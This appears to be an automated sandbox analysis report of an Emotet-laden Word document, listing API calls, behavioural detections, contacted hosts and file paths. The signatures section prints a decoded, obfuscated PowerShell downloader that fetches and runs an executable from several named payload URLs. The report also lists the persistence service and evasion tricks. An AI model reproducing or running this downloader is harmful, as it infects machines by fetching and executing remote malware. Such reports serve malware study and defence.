DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: VSSAPI.DLL/CreateWriter
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ADVAPI32.dll/LookupAccountNameW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: samcli.dll/NetLocalGroupGetMembers
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
DynamicLoader: SAMLIB.dll/SamOpenAlias
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer
DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeAuditEvent
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegSetValueExW
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: wmisvc.dll/IsImproperShutdownDetected
DynamicLoader: Wevtapi.dll/EvtRender
DynamicLoader: Wevtapi.dll/EvtNext
DynamicLoader: Wevtapi.dll/EvtClose
DynamicLoader: Wevtapi.dll/EvtQuery
DynamicLoader: Wevtapi.dll/EvtCreateRenderContext
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/InitializeAcl
DynamicLoader: KERNELBASE.dll/AddAce
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/IsThreadAFiber
DynamicLoader: kernel32.dll/OpenProcessToken
DynamicLoader: KERNELBASE.dll/GetTokenInformation
DynamicLoader: KERNELBASE.dll/DuplicateTokenEx
DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/SetThreadToken
DynamicLoader: KERNELBASE.dll/CheckTokenMembership
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzInitializeContextFromSid
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetCallContext
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ole32.dll/CoImpersonateClient
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoRevertToSelf
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoSwitchCallContext
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: ADVAPI32.dll/LogonUserExExW
DynamicLoader: SspiCli.dll/LogonUserExExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomains
DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy
DynamicLoader: ADVAPI32.dll/LsaNtStatusToWinError
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorControl
DynamicLoader: ADVAPI32.dll/ConvertToAutoInheritPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/DestroyPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/AddAccessAllowedObjectAce
DynamicLoader: ADVAPI32.dll/AddAccessDeniedObjectAce
DynamicLoader: ADVAPI32.dll/AddAuditAccessObjectAce
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoExW
DynamicLoader: ADVAPI32.dll/GetExplicitEntriesFromAclW
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/mknjht34tfserdgfwGetProcAddress
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/mknjht34tfserdgfwGetProcAddress
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
Performs HTTP requests potentially not found in PCAP.
url: test5.freebottlepc.com:80//tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: powershell -enc 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
A scripting utility was executed
command: powershell -enc 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
Uses Windows utilities for basic functionality
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc"
command: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
Queries information on disks, possibly for anti-virtualization
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Behavioural detection: Transacted Hollowing
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (460) called API GetSystemTimeAsFileTime 1611407 times
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
Installs itself for autorun at Windows startup
service name: gluerel
service path: "C:\Windows\SysWOW64\gluerel.exe"
key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
data: "C:\Windows\SysWOW64\gluerel.exe"
CAPE detected the Emotet malware family
A script or command line contains a long continuous string indicative of obfuscation
command: powershell -enc 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
Drops a binary and executes it
binary: C:\Users\user\531.exe
Martian Subprocess Started By IE
ie_martian: c:\program files (x86)\microsoft office\office14\winword.exe
ie_martian: c:\windows\splwow64.exe
Attempts to modify Microsoft Office security settings
Created a service that was not started
service: gluerel
Attempts to execute suspicious powershell command arguments
command: powershell -enc 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
decoded_base64_string: $\x00c\x006\x007\x009\x004\x005\x007\x006\x00=\x00'\x00M\x007\x008\x008\x007\x000\x002\x003\x00'\x00;\x00$\x00a\x006\x000\x008\x009\x000\x006\x00 \x00=\x00 \x00'\x005\x003\x001\x00'\x00;\x00$\x00P\x006\x007\x000\x005\x004\x007\x00=\x00'\x00h\x001\x001\x003\x002\x000\x000\x00'\x00;\x00$\x00I\x003\x007\x005\x004\x004\x009\x00=\x00$\x00e\x00n\x00v\x00:\x00u\x00s\x00e\x00r\x00p\x00r\x00o\x00f\x00i\x00l\x00e\x00+\x00'\x00\\x00'\x00+\x00$\x00a\x006\x000\x008\x009\x000\x006\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x00;\x00$\x00I\x000\x009\x007\x009\x004\x001\x000\x00=\x00'\x00p\x007\x007\x00_\x008\x002\x00'\x00;\x00$\x00q\x007\x008\x004\x00_\x004\x004\x00=\x00&\x00(\x00'\x00n\x00e\x00w\x00-\x00o\x00b\x00'\x00+\x00'\x00j\x00'\x00+\x00'\x00e\x00c\x00t\x00'\x00)\x00 \x00N\x00`\x00e\x00`\x00T\x00.\x00w\x00E\x00b\x00c\x00`\x00l\x00`\x00I\x00e\x00N\x00t\x00;\x00$\x00l\x00_\x007\x003\x002\x006\x00=\x00'\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00k\x00s\x00i\x00c\x00a\x00r\x00d\x00o\x00.\x00c\x00o\x00m\x00/\x00t\x00r\x00a\x00v\x00e\x00l\x00/\x00n\x00t\x00K\x00W\x00z\x00I\x00y\x00D\x00l\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00i\x00a\x00m\x00z\x00b\x00.\x00c\x00o\x00m\x00/\x00a\x00s\x00p\x00n\x00e\x00t\x00_\x00c\x00l\x00i\x00e\x00n\x00t\x00/\x00s\x00y\x00s\x00t\x00e\x00m\x00_\x00w\x00e\x00b\x00/\x00G\x00A\x00A\x00f\x00R\x00Z\x00M\x00q\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00m\x00a\x00l\x00o\x00n\x00i\x00n\x00c\x00.\x00c\x00o\x00m\x00/\x00a\x00p\x00p\x00s\x00/\x00G\x00b\x00B\x00Z\x00o\x00m\x00Q\x00j\x00S\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00k\x00u\x00m\x00a\x00k\x00u\x00n\x00.\x00c\x00o\x00m\x00/\x007\x00j\x00e\x00t\x00/\x003\x00b\x002\x004\x004\x006\x007\x002\x00z\x00e\x00_\x00b\x00t\x00u\x00m\x00n\x00c\x000\x00h\x00-\x002\x001\x007\x008\x008\x009\x006\x00/\x00@\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00i\x00n\x00g\x00e\x00g\x00n\x00e\x00r\x00i\x00a\x00d\x00e\x00l\x00w\x00e\x00b\x00.\x00c\x00o\x00m\x00/\x00f\x00a\x00n\x00t\x00a\x00c\x00a\
x00l\x00c\x00i\x00o\x00/\x008\x006\x001\x001\x00l\x00j\x00o\x00o\x00_\x00o\x004\x00y\x000\x002\x003\x00w\x00-\x003\x007\x005\x004\x007\x000\x004\x003\x007\x001\x00/\x00'\x00.\x00S\x00P\x00L\x00I\x00t\x00(\x00'\x00@\x00'\x00)\x00;\x00$\x00w\x000\x00_\x002\x00_\x003\x003\x004\x00=\x00'\x00U\x006\x008\x001\x009\x004\x005\x00'\x00;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00W\x00_\x004\x006\x007\x001\x001\x008\x00 \x00i\x00n\x00 \x00$\x00l\x00_\x007\x003\x002\x006\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00q\x007\x008\x004\x00_\x004\x004\x00.\x00D\x00o\x00W\x00n\x00L\x00o\x00A\x00d\x00F\x00i\x00L\x00E\x00(\x00$\x00W\x00_\x004\x006\x007\x001\x001\x008\x00,\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00)\x00;\x00$\x00n\x008\x004\x000\x007\x005\x004\x006\x00=\x00'\x00F\x004\x002\x000\x00_\x000\x00'\x00;\x00I\x00f\x00 \x00(\x00(\x00&\x00(\x00'\x00G\x00e\x00t\x00-\x00I\x00'\x00+\x00'\x00t\x00e\x00m\x00'\x00)\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00)\x00.\x00L\x00e\x00n\x00G\x00T\x00H\x00 \x00-\x00g\x00e\x00 \x002\x009\x005\x003\x003\x00)\x00 \x00{\x00.\x00(\x00'\x00I\x00n\x00v\x00'\x00+\x00'\x00o\x00k\x00e\x00'\x00+\x00'\x00-\x00I\x00t\x00e\x00m\x00'\x00)\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00;\x00$\x00r\x007\x004\x006\x002\x006\x00=\x00'\x00i\x009\x000\x003\x007\x002\x003\x00'\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00$\x00h\x001\x005\x008\x008\x008\x00=\x00'\x00D\x003\x004\x007\x008\x003\x00'\x00}\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x00}\x00$\x00R\x008\x003\x005\x003\x003\x005\x00=\x00'\x00j\x009\x002\x000\x006\x002\x00'\x00
Uses suspicious command line tools or Windows utilities
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc"

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 204.79.197.200 [VT] United States
N 185.66.41.16 [VT] Spain
N 184.168.27.40 [VT] United States
N 132.148.196.134 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.bing.com [VT] CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
CNAME a-0001.a-msedge.net [VT]
A 13.107.21.200 [VT]
test5.freebottlepc.com [VT] A 132.148.196.134 [VT]
ksicardo.com [VT] A 185.66.41.16 [VT]
iamzb.com [VT] A 184.168.27.40 [VT]

Summary

C:\Program Files (x86)\Microsoft Office\Office14\hyph??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\mshy32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mshy32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mshy32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hyph32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hhc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hhc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hhc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msdcsc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msdcsc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msdcsc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msproof7.dll
C:\Users\user\AppData\Roaming\Microsoft\UProof\
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3EN.LEX
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.BUD
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.gpd
C:\Windows\sysnative\spool\drivers\x64\3\stdnames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteNames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteFilter.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNote.ini
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\sysnative\wbem\Logs\
C:\Windows\Temp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell\v1.0
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Windows\sysnative\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
